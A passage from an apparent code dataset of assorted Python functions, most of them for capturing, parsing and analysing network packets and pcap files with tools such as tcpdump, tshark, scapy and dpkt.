self.append_data(parsed_pcap_data, eth.src, eth, ts)\n self.append_data(parsed_pcap_data, eth.dst, eth, ts)\n except:\n print \"Error parsing file: %s\" % pcap_file\n \n # Remove mac addresses that didn't send data\n receivers_only = []\n for mac_addr in parsed_pcap_data:\n data_sent = False\n for data in parsed_pcap_data[mac_addr]:\n if (data[1] > 0):\n data_sent = True\n break\n if (not data_sent):\n receivers_only.append(mac_addr)\n\n for mac_addr in receivers_only:\n parsed_pcap_data.pop(mac_addr, None)\n\n # Sort the data \n for mac_addr in parsed_pcap_data:\n series = sorted(parsed_pcap_data[mac_addr], key=operator.itemgetter(0))\n parsed_pcap_data[mac_addr] = series\n\n return parsed_pcap_data", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def start_tcpdump(self):\n\t\tlog_file = os.path.join(self.cfg.file_log_dir,self.info[\"hash_md5\"]+\".pcap\")\n\t\tself.info[\"tcpdump_log_path\"] = log_file\n\t\tcmd = [\"/usr/sbin/tcpdump\", \"-iany\", \"-w\"+self.info[\"tcpdump_log_path\"], \"-c%d\"%(self.cfg.tcpdump_limit)]\n\t\tself.p_tcpdump = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t\tself.log.info(\"tcpdump starts, logfile:%s\",self.info[\"tcpdump_log_path\"] )", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', '-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query 
entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def download_pcap(self, args=None):\r\n result = {\"Task\": \"DownloadPCAP\", \"Error\": \"NoError\", \"Status\": \"FileNotFound\", \"FileName\": args['filename'],\r\n \"FileSize\": 0, \"FileType\": \"UnKnown\", \"FileURL\": 'UnKnown', \"FileUser\": 'UnKnown'}\r\n with EndaceWebSession(app_url=self.applianceurl, username=self.username, password=self.password,\r\n cert_verify=self.cert_verify) as sess:\r\n api = EndaceVisionAPIAdapter(sess)\r\n path = \"files\"\r\n rf = api.get(path)\r\n if rf.status_code == 200:\r\n try:\r\n response = rf.json()\r\n except json.decoder.JSONDecodeError:\r\n raise Exception(f\"JsonDecodeError - path {path}\")\r\n else:\r\n meta = response.get(\"meta\", {})\r\n payload = response.get(\"payload\")\r\n if meta:\r\n meta_error = meta[\"error\"]\r\n if meta_error is not None:\r\n if meta_error is not False:\r\n result['Status'] = \"FileNotFound\"\r\n result['Error'] = str(meta_error)\r\n else:\r\n # Download PCAP File\r\n for file in payload:\r\n if result['FileName'] == file['name'] and len(file[\"id\"]):\r\n file_numerical_part = float(re.findall(r'[\\d\\.]+', file['usage'])[0])\r\n\r\n if 'KB' in file['usage']:\r\n filesize = file_numerical_part * 0.001\r\n elif 'GB' in file['usage']:\r\n filesize = file_numerical_part * 1000\r\n elif 'TB' in file['usage']:\r\n filesize = file_numerical_part * 1000000\r\n else:\r\n filesize = file_numerical_part * 1\r\n\r\n if filesize <= int(args['filesizelimit']):\r\n result['FileName'] = file['name'] + \".pcap\"\r\n if not file['status']['inUse']:\r\n # File available to download\r\n pcapfile_url_path = (\"files/%s/stream?format=pcap\" % file[\"id\"])\r\n d = api.get(pcapfile_url_path)\r\n if d.status_code == 200:\r\n demisto.results(fileResult(f'{result[\"FileName\"]}', d.content,\r\n file_type=entryTypes['entryInfoFile']))\r\n\r\n result['FileURL'] = f'[Endace PCAP URL]'\\\r\n f'({self.applianceurl}/vision2/data/'\\\r\n f'{pcapfile_url_path})'\r\n\r\n result['FileSize'] = file['usage']\r\n result['Status'] = \"DownloadFinished\"\r\n result['FileType'] = file['type']\r\n result['FileUser'] = file['user']\r\n else:\r\n result['Status'] = \"FileNotFound\"\r\n result['Error'] = f\"ServerError - HTTP {rf.status_code} to /{path}\"\r\n else:\r\n result['Status'] = \"FileInUse\"\r\n else:\r\n result['Status'] = \"FileExceedsSizeLimit\"\r\n else:\r\n result['Status'] = \"Failed\"\r\n result['Error'] = f\"ServerError - empty meta data from {path}\"\r\n else:\r\n result['Status'] = \"Failed\"\r\n result['Error'] = f\"ServerError - HTTP {rf.status_code} to /{path}\"\r\n\r\n if result['Status'] == 'Failed':\r\n self.handle_error_notifications(result['Error'])\r\n return result", 
"def retrieve(self, trace_filter={}, limit=0):\n\n if isinstance(limit, int) and limit > 0:\n max_r = limit\n else:\n max_r = 0\n\n try:\n packets = self.__db.find_packets(self._collection, trace_filter, max_r)\n except MemoryError:\n print(\"Warning: cannot allocate sufficient memory for packets, perhaps you are using Windows?\")\n return []\n except:\n return []\n\n # Attempt to decode base64 payloads.\n for packet in packets:\n if packet[\"tcp_info\"] is not None:\n if isinstance(packet[\"tcp_info\"][\"payload\"], bytes):\n try:\n packet[\"tcp_info\"][\"payload\"] = b64decode(packet[\"tcp_info\"][\"payload\"])\n except:\n continue\n\n if packet[\"tls_info\"] is not None:\n for i, data in enumerate(packet[\"tls_info\"][\"data\"]):\n if isinstance(data, bytes):\n try:\n packet[\"tls_info\"][\"data\"][i] = b64decode(data)\n except:\n continue\n\n return packets", "def loadpts(skip=40, filt=None, ref_frame=None):\n pts = []\n for i in range(42):\n print('loading file: ', i)\n if filt is not None:\n traj = md.load(DCD_PROT(i), top=PDB_PROT, atom_indices=filt, stride=skip)\n else:\n traj = md.load(DCD_PROT(i), top=PDB_PROT, stride=skip)\n traj.center_coordinates()\n if ref_frame is not None:\n traj.superpose(ref_frame)\n for i in traj.xyz:\n pts.append(i)\n return np.array(pts)", "def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p", "def accumulate_packets():\n l = []\n packets = sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=printing)\n print(\"Processing packets!\")\n for packet in packets:\n l.append({\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)})\n return l", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def process_pcap(self):\n # Create Core Controller\n controller = Controller(self.args.input, self.args.extraTests, 
self.args.non_verbose, self.args.output,\n self.args.debug)\n\n if not self.args.skip:\n # Load PCAP statistics\n recalculate_intervals = None\n if self.args.recalculate_delete:\n recalculate_intervals = True\n elif self.args.recalculate_yes:\n recalculate_intervals = True\n self.args.recalculate = True\n elif self.args.recalculate_no:\n recalculate_intervals = False\n self.args.recalculate = True\n controller.load_pcap_statistics(self.args.export, self.args.recalculate, self.args.statistics,\n self.args.statistics_interval, self.args.recalculate_delete,\n recalculate_intervals)\n\n if self.args.list_intervals:\n controller.list_interval_statistics()\n\n # Create statistics plots\n if self.args.plot is not None:\n do_entropy = False\n if self.args.extraTests:\n do_entropy = True\n controller.create_statistics_plot(self.args.plot, do_entropy)\n\n # Check rng seed\n if not isinstance(self.args.rngSeed, list):\n self.args.rngSeed = [self.args.rngSeed]\n\n # Process attack(s) with given attack params\n if self.args.attack is not None:\n # If attack is present, load attack with params\n controller.process_attacks(self.args.attack, self.args.rngSeed, self.args.time, self.args.inject_empty)\n\n # Parameter -q without arguments was given -> go into query loop\n if self.args.query == [None]:\n controller.enter_query_mode()\n # Parameter -q with arguments was given -> process query\n elif self.args.query is not None:\n controller.process_db_queries(self.args.query, True)", "def next_batch(self):\n\n while self.cap.isOpened():\n flag, frame = self.cap.read()\n yield frame", "def main():\n connection = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.htons(0x03))\n\n # Start the main loop.\n while True:\n # 65536 is the biggest buffer size that can be used.\n raw_data, addr = connection.recvfrom(65536)\n dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data)\n print('\\nEthernet Frame:')\n print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto))", "def read_packets(serial_input):\n while 1:\n header = scan_to_headerword(serial_input)\n yield header.read_packet(serial_input)", "def sniffing():\n sniff(store=False, prn=lambda p: threading.Thread(target=next, args=(p,)).start(), iface=IFACE)", "def read_pkt_seq(self):\n pkt = self.read_pkt_line()\n while pkt:\n yield pkt\n pkt = self.read_pkt_line()", "def sniff_continuously(self, packet_count=None):\n \n self.lcapture_tshark = (self.lcapture_tshark or \n self.eventloop.run_until_complete(self._get_tshark_process()))\n\n self._running_processes.add(self.lcapture_tshark)\n\n # Retained for backwards compatibility and to add documentation.\n return self._packets_from_tshark_sync(packet_count=packet_count, \n tshark_process=self.lcapture_tshark)", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n 
counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def process_trace(pcap_filepath, graph_dir_exp, stat_dir_exp, failed_conns_dir_exp, acksize_tcp_dir_exp, tcpcsm, mptcp_connections=None, print_out=sys.stdout, light=False, return_dict=False):\n cmd = ['tstat', '-s', os.path.basename(pcap_filepath[:-5]), pcap_filepath]\n\n keep_tstat_log = False if return_dict else True\n\n try:\n connections = process_tstat_cmd(cmd, pcap_filepath, keep_log=keep_tstat_log, graph_dir_exp=graph_dir_exp)\n except TstatError as e:\n print(str(e) + \": skip process\", file=sys.stderr)\n return\n\n # Directory containing all TCPConnections that tried to be MPTCP subflows, but failed to\n failed_conns = {}\n\n if tcpcsm:\n retransmissions_tcpcsm(pcap_filepath, connections)\n\n acksize_all = {co.C2S: {}, co.S2C: {}}\n\n if not light:\n inverse_conns = create_inverse_tcp_dictionary(connections)\n\n acksize_all = compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns)\n\n acksize_all_mptcp = {co.C2S: {}, co.S2C: {}}\n\n if mptcp_connections:\n fast_conns = get_preprocessed_connections(mptcp_connections)\n for flow_id in connections:\n # Copy info to mptcp connections\n copy_info_to_mptcp_connections(connections, mptcp_connections, failed_conns, acksize_all, acksize_all_mptcp, flow_id,\n fast_conns=fast_conns)\n\n if not light:\n for conn_id, conn in mptcp_connections.iteritems():\n for direction in co.DIRECTIONS:\n max_ack = timedelta(0)\n max_payload = timedelta(0)\n for flow_id, flow in conn.flows.iteritems():\n if co.TIME_LAST_ACK_TCP in flow.attr[direction] and (flow.attr[direction][co.TIME_LAST_ACK_TCP] - max_ack).total_seconds() > 0.0:\n max_ack = flow.attr[direction][co.TIME_LAST_ACK_TCP]\n\n if co.TIME_LAST_PAYLD_TCP in flow.attr[direction] and (flow.attr[direction][co.TIME_LAST_PAYLD_TCP] - max_payload).total_seconds() > 0.0:\n max_payload = flow.attr[direction][co.TIME_LAST_PAYLD_TCP]\n\n mptcp_connections[conn_id].attr[direction][co.TIME_LAST_ACK_TCP] = max_ack\n mptcp_connections[conn_id].attr[direction][co.TIME_LAST_PAYLD_TCP] = max_payload\n\n try:\n compute_mptcp_dss_retransmissions(pcap_filepath, mptcp_connections, fast_conns)\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n\n if return_dict:\n if mptcp_connections:\n return connections, acksize_all_mptcp\n else:\n return connections, acksize_all\n else:\n # Save connections info\n if mptcp_connections:\n co.save_data(pcap_filepath, acksize_tcp_dir_exp, acksize_all_mptcp)\n # Also save TCP connections that failed to be MPTCP subflows\n co.save_data(pcap_filepath, failed_conns_dir_exp, failed_conns)\n else:\n co.save_data(pcap_filepath, acksize_tcp_dir_exp, acksize_all)\n co.save_data(pcap_filepath, stat_dir_exp, connections)", "def ingest_packet(self, pkt, 
pkt_receive_timestamp):\n #*** Packet length on the wire:\n self.packet_length = len(pkt)\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n eth_src = _mac_addr(eth.src)\n eth_dst = _mac_addr(eth.dst)\n eth_type = eth.type\n #*** We only support IPv4 (TBD: add IPv6 support):\n if eth_type != 2048:\n self.logger.error(\"Non IPv4 packet, eth_type is %s\", eth_type)\n return 0\n ip = eth.data\n self.ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n self.ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** We only support TCP:\n if ip.p != 6:\n self.logger.error(\"Non TCP packet, ip_proto=%s\",\n ip.p)\n return 0\n proto = 'tcp'\n tcp = ip.data\n self.tcp_src = tcp.sport\n self.tcp_dst = tcp.dport\n self.tcp_seq = tcp.seq\n self.tcp_acq = tcp.ack\n self.tcp_flags = tcp.flags\n self.payload = tcp.data\n #*** Generate a hash unique to flow for packets in either direction\n self.fcip_hash = _hash_5tuple(self.ip_src, self.ip_dst, self.tcp_src,\n self.tcp_dst, proto)\n #*** Check to see if we already know this identity:\n db_data = {'hash': self.fcip_hash}\n self.fcip_doc = self.fcip.find_one(db_data)\n if not self.fcip_doc:\n #*** Get flow direction (which way is TCP initiated). Client is\n #*** the end that sends the initial TCP SYN:\n if _is_tcp_syn(tcp.flags):\n self.logger.debug(\"Matched TCP SYN first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 'verified-SYN'\n elif _is_tcp_synack(tcp.flags):\n self.logger.debug(\"Matched TCP SYN+ACK first pkt, src_ip=%s\",\n self.ip_src)\n self.client = self.ip_dst\n self.server = self.ip_src\n self.packet_direction = 's2c'\n self.verified_direction = 'verified-SYNACK'\n else:\n self.logger.debug(\"Unmatch state first pkt, tcp_flags=%s\",\n tcp.flags)\n self.client = self.ip_src\n self.server = self.ip_dst\n self.packet_direction = 'c2s'\n self.verified_direction = 0\n #*** Neither direction found, so add to FCIP database:\n self.fcip_doc = {'hash': self.fcip_hash,\n 'ip_A': self.ip_src,\n 'ip_B': self.ip_dst,\n 'port_A': self.tcp_src,\n 'port_B': self.tcp_dst,\n 'proto': proto,\n 'finalised': 0,\n 'packet_count': 1,\n 'latest_timestamp' : pkt_receive_timestamp,\n 'packet_timestamps': [pkt_receive_timestamp,],\n 'tcp_flags': [tcp.flags,],\n 'packet_lengths': [self.packet_length,],\n 'client': self.client,\n 'server': self.server,\n 'packet_directions': [self.packet_direction,],\n 'verified_direction': self.verified_direction,\n 'suppressed': 0}\n self.logger.debug(\"FCIP: Adding record for %s to DB\",\n self.fcip_doc)\n db_result = self.fcip.insert_one(self.fcip_doc)\n self.packet_count = 1\n\n elif self.fcip_doc['finalised']:\n #*** The flow is already finalised just increment packet count:\n self.fcip_doc['packet_count'] += 1\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count']},})\n self.packet_count = self.fcip_doc['packet_count']\n\n else:\n #*** We've found the flow in the FCIP database, now update it:\n self.logger.debug(\"FCIP: found existing record %s\", self.fcip_doc)\n #*** Rate this packet as c2s or s2c direction:\n if self.client == self.ip_src:\n self.packet_direction = 'c2s'\n elif self.client == self.ip_dst:\n self.packet_direction = 's2c'\n else:\n self.packet_direction = 'unknown'\n #*** Increment packet count. 
Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def get_available_portoffset(target=\"localhost\"):\n target_ip = socket.gethostbyname(target)\n for portoffset in range(10000, 61000, 1000):\n i = portoffset + 873\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((target_ip, i))\n sock.close()\n if result != 0:\n logger.debug(\"port open {0}\".format(portoffset))\n return portoffset\n return None", "def iplayer_from_raw(raw, linktype=1):\n if linktype == 1: # ethernet\n pkt = dpkt.ethernet.Ethernet(raw)\n ip = pkt.data\n elif linktype == 101: # raw\n ip = dpkt.ip.IP(raw)\n else:\n raise Exception(\"unknown PCAP linktype\")\n return ip", "def mptcp_connections(self, pkts):\n\t\tcount = 0\n\t\t#MPTCP_Capable = 0x0\n\t\t#MPTCP_CapableACK ---> successful handshake\n\t\tprint \"======================================================================\"\n\t\tprint \"Successful Handshake --- Look for Ack packets with MPTCP option Header\"\n\t\tprint \"\"\"Token = connectionID = SHA1(key)[0-32] of Other party's key. (Capture from\n\t\t either step 2 or 3 in the first handshake)\"\"\"\n\t\tprint \"Total packets: %s\" % len(pkts)\n\t\tprint \"======================================================================\"\n\t\tprint \"Identifying MPTCP Connections....\"\n\t\tfor i in range(len(pkts)):\n\t\t\tif(MPTCP_CapableACK in pkts[i] and pkts[i][TCPOption_MP].mptcp.subtype == 0):\n\t\t\t\tcount +=1 #Count the number of distinct MPTCP connections\n\t\t\t\t\n\t\t\t\t#Compute the receiver's token\n\t\t\t\tself.key_rcv = pkts[i][TCPOption_MP].mptcp.rcv_key\n\t\t\t\tself.rcv_token, self.rcv_dsn = self.key2tokenAndDSN(self.key_rcv)\n\n\t\t\t\t#Compute the sender's token\n\t\t\t\tself.key_snd = pkts[i][TCPOption_MP].mptcp.snd_key\n\t\t\t\tself.snd_token, self.snd_dsn = self.key2tokenAndDSN(self.key_snd)\n\n\t\t\t\tprint (\"%i. 
New MPTCP Connection (Successful Handshake) src: %s; dest: %s; Sender's key: %s; Receiver's key: %s; Receivers Token (connectionID): %s; Sender's Token: %s\" % (count, pkts[i][IP].src, pkts[i][IP].dst, pkts[i][TCPOption_MP].mptcp.snd_key, pkts[i][TCPOption_MP].mptcp.rcv_key, self.rcv_token, self.snd_token))\n\t\tprint \"Total MPTCP Connections: %i\" % count", "def sniff_ip(time_to_sniff):\r\n ip_dict = dict()\r\n port_dict = dict()\r\n packets = sniff(timeout=time_to_sniff, filter=\"ip\")\r\n\r\n for i in packets:\r\n sport = 0\r\n src = i['IP'].src\r\n\r\n if \"TCP\" in i:\r\n sport = i['TCP'].sport\r\n\r\n elif \"UDP\" in i:\r\n sport = i['UDP'].sport\r\n\r\n if not src in ip_dict.keys():\r\n ip_dict[src] = 1\r\n\r\n else:\r\n ip_dict[src] += 1\r\n\r\n if sport:\r\n if not sport in port_dict.keys():\r\n port_dict[sport] = 1\r\n\r\n else:\r\n port_dict[sport] += 1\r\n\r\n return ip_dict, port_dict", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def MatchIpAddressInArpPackets(self):\n return self._get_attribute('matchIpAddressInArpPackets')", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def get_connections(self, kind='inet'):\r\n # Note: in case of UNIX sockets we're only able to determine the\r\n # local bound path while the remote endpoint is not retrievable:\r\n # http://goo.gl/R3GHM\r\n inodes = {}\r\n # os.listdir() is gonna raise a lot of access denied\r\n # exceptions in case of unprivileged user; that's fine:\r\n # lsof does the same so it's unlikely that we can to better.\r\n for fd in os.listdir(\"/proc/%s/fd\" % self.pid):\r\n try:\r\n inode = os.readlink(\"/proc/%s/fd/%s\" % (self.pid, fd))\r\n except OSError:\r\n continue\r\n if inode.startswith('socket:['):\r\n # the process is using a socket\r\n inode = inode[8:][:-1]\r\n inodes[inode] = fd\r\n\r\n if not inodes:\r\n # no connections for this process\r\n return []\r\n\r\n def process(fin, family, type_):\r\n retlist = []\r\n try:\r\n f = open(fin, 'r')\r\n except IOError:\r\n # IPv6 not supported on this platform\r\n err = sys.exc_info()[1]\r\n if err.errno == errno.ENOENT and fin.endswith('6'):\r\n return []\r\n else:\r\n raise\r\n try:\r\n f.readline() # skip the first line\r\n for line in f:\r\n # IPv4 / IPv6\r\n if family in (socket.AF_INET, socket.AF_INET6):\r\n _, laddr, raddr, status, _, _, _, _, _, inode = \\\r\n line.split()[:10]\r\n if inode in inodes:\r\n laddr = self._decode_address(laddr, family)\r\n raddr = self._decode_address(raddr, family)\r\n if type_ == socket.SOCK_STREAM:\r\n status = _TCP_STATES_TABLE[status]\r\n else:\r\n 
status = \"\"\r\n fd = int(inodes[inode])\r\n conn = nt_connection(fd, family, type_, laddr,\r\n raddr, status)\r\n retlist.append(conn)\r\n elif family == socket.AF_UNIX:\r\n tokens = line.split()\r\n _, _, _, _, type_, _, inode = tokens[0:7]\r\n if inode in inodes:\r\n\r\n if len(tokens) == 8:\r\n path = tokens[-1]\r\n else:\r\n path = \"\"\r\n fd = int(inodes[inode])\r\n type_ = int(type_)\r\n conn = nt_connection(fd, family, type_, path,\r\n None, \"\")\r\n retlist.append(conn)\r\n else:\r\n raise ValueError(family)\r\n return retlist\r\n finally:\r\n f.close()\r\n\r\n tcp4 = (\"tcp\" , socket.AF_INET , socket.SOCK_STREAM)\r\n tcp6 = (\"tcp6\", socket.AF_INET6, socket.SOCK_STREAM)\r\n udp4 = (\"udp\" , socket.AF_INET , socket.SOCK_DGRAM)\r\n udp6 = (\"udp6\", socket.AF_INET6, socket.SOCK_DGRAM)\r\n unix = (\"unix\", socket.AF_UNIX, None)\r\n\r\n tmap = {\r\n \"all\" : (tcp4, tcp6, udp4, udp6, unix),\r\n \"tcp\" : (tcp4, tcp6),\r\n \"tcp4\" : (tcp4,),\r\n \"tcp6\" : (tcp6,),\r\n \"udp\" : (udp4, udp6),\r\n \"udp4\" : (udp4,),\r\n \"udp6\" : (udp6,),\r\n \"unix\" : (unix,),\r\n \"inet\" : (tcp4, tcp6, udp4, udp6),\r\n \"inet4\": (tcp4, udp4),\r\n \"inet6\": (tcp6, udp6),\r\n }\r\n if kind not in tmap:\r\n raise ValueError(\"invalid %r kind argument; choose between %s\"\r\n % (kind, ', '.join([repr(x) for x in tmap])))\r\n ret = []\r\n for f, family, type_ in tmap[kind]:\r\n ret += 